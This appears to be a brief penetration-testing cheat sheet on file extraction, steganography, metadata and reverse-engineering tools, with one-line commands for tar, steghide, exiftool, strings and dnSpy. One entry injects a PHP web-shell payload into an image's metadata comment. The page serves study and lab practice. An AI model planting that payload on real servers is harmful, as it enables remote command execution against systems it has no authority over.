File Extraction & Reverse Eng.

File Extraction

Tar

untar + unzip

tar xvzf file.tar.gz

Stegnography

extracting stego files

steghide extract -sf irked.jpg

Exiftool

check metadata

exiftool file.pdf

inject payload in image

exiftool -Comment='<?php system($_GET['cmd']); ?>' cat.jpeg

Reverse Engineer

Strings

Check the strings of executable files for both windows (.exe) & Linux (binary)

dnSpy

Last updated